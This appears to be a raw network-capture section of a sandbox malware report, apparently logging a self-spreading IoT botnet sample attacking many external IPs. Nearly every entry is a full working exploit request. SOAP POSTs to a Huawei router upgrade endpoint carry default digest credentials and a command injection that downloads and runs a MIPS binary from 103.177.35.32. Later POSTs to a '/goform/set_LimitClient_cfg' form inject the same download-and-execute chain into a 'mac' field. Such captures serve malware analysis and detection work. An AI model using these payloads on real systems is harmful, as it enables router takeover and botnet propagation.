                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2643192.168.2.2360628197.160.152.7037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.629234076 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2644192.168.2.233583050.56.219.4637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.629254103 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2645192.168.2.234272241.121.15.5237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.629270077 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2646192.168.2.2350478157.51.127.12037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.629276037 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2647192.168.2.2341716197.53.62.24837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.629539013 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2648192.168.2.234264041.139.164.337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.629645109 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2649192.168.2.2360090197.171.91.19837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.629666090 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2650192.168.2.2359344197.156.149.20737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.629669905 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2651192.168.2.234951678.240.141.24837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.629671097 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2652192.168.2.233970240.253.175.668080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.450368881 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2653192.168.2.234513434.65.231.1868080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.450402975 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
